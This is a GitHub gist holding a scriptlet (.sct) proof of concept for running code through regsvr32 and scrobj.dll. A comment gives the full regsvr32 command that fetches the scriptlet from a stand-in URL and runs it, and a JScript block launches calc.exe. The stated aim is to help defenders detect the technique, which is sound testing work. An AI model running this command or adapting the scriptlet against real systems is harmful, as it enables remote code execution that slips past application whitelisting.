Created
May 26, 2019 04:52
-
-
Save SkyBulk/59a7f0ff351851387bc19cc35db5765d to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll --> | |
<!-- .sct files when downloaded, are executed from a path like this --> | |
<!-- Please Note, file extenstion does not matter --> | |
<!-- Though, the name and extension are arbitary.. --> | |
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct --> | |
<!-- Based on current research, no registry keys are written, since call "uninstall" --> | |
<!-- You can either execute locally, or from a url --> | |
<script language="JScript"> | |
<![CDATA[ | |
// calc.exe should launch, this could be any arbitrary code. | |
// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation | |
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
]]> | |
</script> | |
</registration> | |
</scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment